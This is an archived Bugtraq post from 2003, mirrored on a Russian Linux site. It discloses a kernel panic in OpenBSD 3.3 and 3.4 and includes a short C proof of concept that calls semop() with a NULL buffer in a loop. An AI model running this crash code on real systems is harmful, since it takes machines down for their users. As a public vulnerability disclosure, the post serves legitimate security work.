The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


yet another panic() in OpenBSD


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Fri, 21 Nov 2003 17:46:01 -0500 (EST)
From: noir@uberhax0r.net
To: bugtraq@securityfocus.com
Subject: yet another panic() in OpenBSD


a project lacking the basic QA and unit testing and here is the outcome:

#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>

int
main()
{
    int i;

        for(i = 0; i < 0x40; i++)
                semop(i, (struct sembuf *) NULL, 0);


}


PANIC in OpenBSD 3.3 and 3.4 is confirmed.



<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру